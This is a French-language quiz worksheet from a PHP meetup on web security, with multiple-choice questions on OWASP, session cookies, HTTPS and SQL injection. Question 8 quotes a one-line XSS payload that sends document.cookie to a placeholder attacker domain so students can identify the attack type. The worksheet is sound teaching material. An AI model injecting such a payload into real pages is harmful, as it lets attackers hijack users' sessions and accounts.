Wayground logo

Free Printable Worksheets

Font size

S
M
L
XL
Worksheets

PHP Tours Meetup #27 Sécurité et vulnérabilités Web

Total questions: 9

Worksheet time: 4mins

Name
Class
Date
1.

(Question Gratuite) A propos de la conférence de ce soir:

a)

J'ai appris beaucoup de choses cools!

b)

Ca m'a permis de réviser mes connaisances!

c)

Je connaissais déjà tout!

d)

Je viens voir les organisateurs pour faire la prochaine conférence sur la sécurité!

2.

Que signifie l'acronyme "OWASP" ?

a)

Organisation for World Acknowledgment of Security Principle

b)

Of Web And Security Policy

c)

Open Web Application Security Project

d)

Omega Werewolf And the Super Poney

3.

Quelle est la catégorie placée en haut du TOP 10 de l'OWASP (version 2021) ?

a)

Contrôles d'accès défaillants

b)

Mauvaise configuration de sécurité

c)

Identification et authentification de mauvaise qualité

d)

Supervision et Journalisation Insuffisantes

4.

Si je navigue sur un site en HTTPS je suis 100% à l'abri de tout piratage.

a)

Vrai

b)

Faux

5.

Il peut suffire d'un cookie de session pour accéder au compte d'une personne sans connaître ses identifiants (login/mot de passe)

a)

Vrai

b)

Faux

6.

Laquelle de ces mesures N'aiderait PAS à limiter la possibilité d'un vol de cookie ?

a)

Utiliser l'attribut "HttpOnly"

b)

Limiter la durée de vie des cookies

c)

Filtrer les données soumises par les utilisateurs avant de les stocker

d)

Imposer un changement de mot de passe tous les mois

7.

Il n'y a que par le biais des sites Web que l'ont peut se faire pirater

a)

Vrai

b)

Faux

8.

> (new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;

La ligne de code ci-dessus est typique d'une attaque de type:

a)

Injection SQL

b)

Cross-site scripting (XSS)

c)

Brute force

d)

Man in the middle

9.

Quelle est, pour vous, la meilleure proposition pour éviter les failles de type "injection SQL" ?

a)

Utiliser une base NoSQL

b)

Ne pas mettre de formulaire sur son site

c)

Utiliser un ORM pour gérer les requêtes à la base

d)

Venir aux meetup de l'AFUP sur la sécurité